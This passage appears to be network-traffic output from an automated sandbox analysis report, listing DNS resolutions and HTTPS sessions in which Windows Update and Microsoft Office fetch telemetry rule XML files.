                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:29.274218082 CET1.1.1.1192.168.2.50x902No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:29.274218082 CET1.1.1.1192.168.2.50x902No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:48.382217884 CET1.1.1.1192.168.2.50xd5c8No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:48.382217884 CET1.1.1.1192.168.2.50xd5c8No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:48.382217884 CET1.1.1.1192.168.2.50xd5c8No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com3.5.30.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com3.5.20.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com3.5.10.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com3.5.25.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com52.217.229.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com3.5.29.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com16.15.216.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.239476919 CET1.1.1.1192.168.2.50x4e95No error (0)s3-w.us-east-1.amazonaws.com16.182.68.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:27:23.006633997 CET1.1.1.1192.168.2.50xe36aNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:28:15.200026989 CET1.1.1.1192.168.2.50x7a9cNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:28:43.010230064 CET1.1.1.1192.168.2.50xfe29No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:29:23.119831085 CET1.1.1.1192.168.2.50xd4feNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:30:23.181941986 CET1.1.1.1192.168.2.50x6b2fNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:31:15.228418112 CET1.1.1.1192.168.2.50x4edNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:32:19.161128044 CET1.1.1.1192.168.2.50x35b4No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:33:31.213044882 CET1.1.1.1192.168.2.50x7cfaNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 20.109.210.53 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:17 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OKvleD1bOO+N2GM&MD=X99kat3G HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com
2024-11-14 14:25:17 UTC | 560 | IN | HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/octet-stream
Expires: -1
Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
MS-CorrelationId: be3f8952-480f-46b6-927e-7361c0324afa
MS-RequestId: 7d082424-bf95-4ae0-a4d1-73995563d4d0
MS-CV: rGemSLecdEK+nLex.0
X-Microsoft-SLSClientCache: 2880
Content-Disposition: attachment; filename=environment.cab
X-Content-Type-Options: nosniff
Date: Thu, 14 Nov 2024 14:25:16 GMT
Connection: close
Content-Length: 24490


Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.2.5 | 49707 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:17 UTC | 195 | OUT | GET /rules/other-Win32-v19.bundle HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:17 UTC | 471 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:17 GMT
Content-Type: text/plain
Content-Length: 218853
Connection: close
Vary: Accept-Encoding
Cache-Control: public
Last-Modified: Wed, 13 Nov 2024 03:39:40 GMT
ETag: "0x8DD0394CDDBD898"
x-ms-request-id: 406a0d50-a01e-0002-58e4-355074000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142517Z-1749fc9bdbd2c44rhC1DFWbxe000000002sg000000002efr
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port
2 | 192.168.2.5 | 49713 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:19 UTC | 192 | OUT | GET /rules/rule120600v4s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:20 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:19 GMT
Content-Type: text/xml
Content-Length: 2980
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
ETag: "0x8DC582BA80D96A1"
x-ms-request-id: 26663d07-401e-0029-2faf-319b43000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142519Z-16547b76f7f7rtshhC1DFWrtqn0000000ksg00000000dxee
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.5 | 49714 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:19 UTC | 192 | OUT | GET /rules/rule120609v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:20 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:20 GMT
Content-Type: text/xml
Content-Length: 408
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
ETag: "0x8DC582BB56D3AFB"
x-ms-request-id: 9f0f5f99-201e-0096-25f1-2cace6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142520Z-16547b76f7fr28cchC1DFWnuws0000000kt000000000kc69
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:20 UTC | 408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
4 | 192.168.2.5 | 49711 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:20 UTC | 192 | OUT | GET /rules/rule224902v2s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:20 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:20 GMT
Content-Type: text/xml
Content-Length: 450
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
ETag: "0x8DC582BD4C869AE"
x-ms-request-id: 289c86fb-001e-0066-7f0d-36561e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142520Z-1749fc9bdbddwt7mhC1DFWssk800000000dg000000007ntv
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-11-14 14:25:20 UTC | 450 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


Session ID | Source IP | Source Port | Destination IP | Destination Port
5 | 192.168.2.5 | 49715 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:20 UTC | 192 | OUT | GET /rules/rule120608v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:20 UTC | 515 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:20 GMT
Content-Type: text/xml
Content-Length: 2160
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
ETag: "0x8DC582BA3B95D81"
x-ms-request-id: d96f0357-501e-00a0-7911-369d9f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142520Z-1749fc9bdbddwt7mhC1DFWssk800000000kg000000008ebg
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-11-14 14:25:20 UTC | 2160 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


Session ID    Source IP      Source Port    Destination IP    Destination Port
6             192.168.2.5    49712          13.107.246.45     443

Timestamp    Bytes transferred    Direction    Data
2024-11-14 14:25:20 UTC    193    OUT    GET /rules/rule120402v21s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:20 UTC    494    IN    HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:20 GMT
Content-Type: text/xml
Content-Length: 3788
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
ETag: "0x8DC582BAC2126A6"
x-ms-request-id: 053649b2-001e-00ad-26a0-34554b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142520Z-r178fb8d765j7nnvhC1DFW39w400000001v00000000016m6
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:20 UTC    3788    IN    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


Session ID    Source IP      Source Port    Destination IP    Destination Port
7             192.168.2.5    49716          13.107.246.45     443

Timestamp    Bytes transferred    Direction    Data
2024-11-14 14:25:20 UTC    192    OUT    GET /rules/rule120610v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:21 UTC    470    IN    HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:20 GMT
Content-Type: text/xml
Content-Length: 474
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
ETag: "0x8DC582B9964B277"
x-ms-request-id: ee786005-101e-0065-140e-2d4088000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142520Z-16547b76f7f22sh5hC1DFWyb4w0000000kt0000000000ddu
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:21 UTC    474    IN    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID    Source IP      Source Port    Destination IP    Destination Port
8             192.168.2.5    49717          13.107.246.45     443

Timestamp    Bytes transferred    Direction    Data
2024-11-14 14:25:20 UTC    192    OUT    GET /rules/rule120611v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:21 UTC    470    IN    HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:20 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
ETag: "0x8DC582B9F6F3512"
x-ms-request-id: fa88b3fb-501e-0064-3f39-361f54000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142520Z-1749fc9bdbd4dqj6hC1DFWr4n400000002hg00000000k04g
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:21 UTC    415    IN    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session ID    Source IP      Source Port    Destination IP    Destination Port
9             192.168.2.5    49718          13.107.246.45     443

Timestamp    Bytes transferred    Direction    Data
2024-11-14 14:25:21 UTC    192    OUT    GET /rules/rule120612v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:21 UTC    470    IN    HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:21 GMT
Content-Type: text/xml
Content-Length: 471
Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 42046764-d01e-0028-78a2-347896000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142521Z-r178fb8d765kzgrxhC1DFWrsuc00000002g000000000by1q
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:21 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
10 | 192.168.2.5 | 49719 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:21 UTC | 192 | OUT | GET /rules/rule120613v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:21 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:21 GMT
Content-Type: text/xml
Content-Length: 632
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
ETag: "0x8DC582BB6E3779E"
x-ms-request-id: 5ead3c92-b01e-0084-18a1-34d736000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142521Z-1749fc9bdbdqhv2phC1DFWvd3000000002k000000000d6a8
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:21 UTC | 632 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


Session ID | Source IP | Source Port | Destination IP | Destination Port
11 | 192.168.2.5 | 49720 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:21 UTC | 192 | OUT | GET /rules/rule120614v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:21 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:21 GMT
Content-Type: text/xml
Content-Length: 467
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
ETag: "0x8DC582BA6C038BC"
x-ms-request-id: 6ba2b82c-f01e-0071-33a3-34431c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142521Z-1749fc9bdbdmg6wshC1DFWu2bc00000002s00000000094cb
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:21 UTC | 467 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
12 | 192.168.2.5 | 49721 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:21 UTC | 192 | OUT | GET /rules/rule120615v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:21 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:21 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
ETag: "0x8DC582BBAD04B7B"
x-ms-request-id: 933b6e18-c01e-0079-6ca0-34e51a000000
x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142521Z-1749fc9bdbdmg6wshC1DFWu2bc00000002tg000000005px3
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:21 UTC   407                 IN          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID   Source IP     Source Port   Destination IP   Destination Port
13           192.168.2.5   49722         13.107.246.45    443
Timestamp                 Bytes transferred   Direction   Data
2024-11-14 14:25:21 UTC   192                 OUT         GET /rules/rule120616v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:21 UTC   470                 IN          HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:21 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
ETag: "0x8DC582BB344914B"
x-ms-request-id: 3105e439-501e-0064-36ea-351f54000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142521Z-1749fc9bdbdqhv2phC1DFWvd3000000002gg00000000fsqh
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:21 UTC   486                 IN          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID   Source IP     Source Port   Destination IP   Destination Port
14           192.168.2.5   49725         13.107.246.45    443
Timestamp                 Bytes transferred   Direction   Data
2024-11-14 14:25:22 UTC   192                 OUT         GET /rules/rule120619v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:22 UTC   491                 IN          HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:22 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
ETag: "0x8DC582B9698189B"
x-ms-request-id: 764b3efa-d01e-007a-4391-36f38c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142522Z-r178fb8d765ljg7ghC1DFWfk4c00000002e000000000bzk0
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-11-14 14:25:22 UTC   407                 IN          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID   Source IP     Source Port   Destination IP   Destination Port
15           192.168.2.5   49724         13.107.246.45    443
Timestamp                 Bytes transferred   Direction   Data
2024-11-14 14:25:22 UTC   192                 OUT         GET /rules/rule120618v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:22 UTC   491                 IN          HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:22 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
ETag: "0x8DC582B9018290B"
x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142522Z-16547b76f7fdf69shC1DFWcpd00000000kh000000000pfsg
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
16 | 192.168.2.5 | 49723 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:22 UTC | 192 | OUT | GET /rules/rule120617v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:22 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:22 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
ETag: "0x8DC582BA310DA18"
x-ms-request-id: 3b9707c2-c01e-0082-5508-36af72000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142522Z-r178fb8d765j7nnvhC1DFW39w400000001p000000000gqxp
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:22 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID | Source IP | Source Port | Destination IP | Destination Port
17 | 192.168.2.5 | 49726 | 13.107.246.45 | 443
